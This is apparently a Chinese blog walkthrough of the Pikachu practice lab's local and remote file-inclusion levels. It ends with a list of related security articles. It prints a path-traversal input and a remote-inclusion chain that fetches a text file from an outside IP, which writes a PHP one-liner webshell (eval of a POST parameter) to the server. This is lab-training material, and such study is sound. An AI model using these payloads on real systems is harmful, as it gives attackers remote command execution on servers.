pikachu文件包含漏洞靶场通关攻略

本地文件包含

首先,在靶场根目录下创建一个php文件,内容是phpinfo();

其次,上传一个任意球星图片,会跳转到带有filename参数的php文件下

然后,将filename的参数改为可以访问到我们创建的php文件的地址

../../../../2.php

就可以访问到我们的phpinfo

远程文件包含

在进行远程文件包含时,要先修改两个参数

php.ini下的allow_url_include和allow_url_fopen两个参数改为On,前面的冒号也要删掉

(看自己是什么版本的PHP,要和版本对应)

进行任意图片提交

在云服务器上创建一个2.txt文件 内容是

复制代码
<?php fputs(fopen("shell.php","w"),'<?php eval($_POST["cmd"]);?>')?>

就是创建一个shell.php 文件,文件内容为一句话木马

然后,将filename的参数改为我们2.txt的地址

http://47.121.191.208/2.txt

回车后就可以在fileinclude目录下找到我们上传的shell.php文件

接下来使用连接工具进行webshell连接,成功连接

相关推荐
CertiK41 分钟前
CertiK实测:Skill扫描并非安全边界
人工智能·安全·openclaw
WZTTMoon1 小时前
从互斥锁到无锁,Java 20年并发安全进化史
java·python·安全
软件供应链安全指南1 小时前
跟随 Gartner 洞察:AIST 从单点能力到全域安全治理的蜕变
大数据·人工智能·安全·gartner·问境aist·aist
山川绿水1 小时前
bugku——MISC——键盘
安全·网络安全·系统安全·密码学
上海云盾-小余2 小时前
CC 攻击与 DDoS 联动防护:如何构建一体化流量清洗架构
网络·安全·游戏·架构·ddos
恒星科通2 小时前
旅游景区大功率高清晰应急疏散广播技术方案
安全·旅游·广播·应急广播
思慕很大很大3 小时前
Web安全:从“来源校验”到“CSRF Token”的演进
安全·浏览器
波兰的蓝3 小时前
CVE-2016-4437 Apache Shiro反序列化漏洞复现
web安全·网络安全
Old Uncle Tom4 小时前
OpenClaw 的安全分析
网络·安全
牢七5 小时前
jfinal_cms-v5.1.0 审计前缀
安全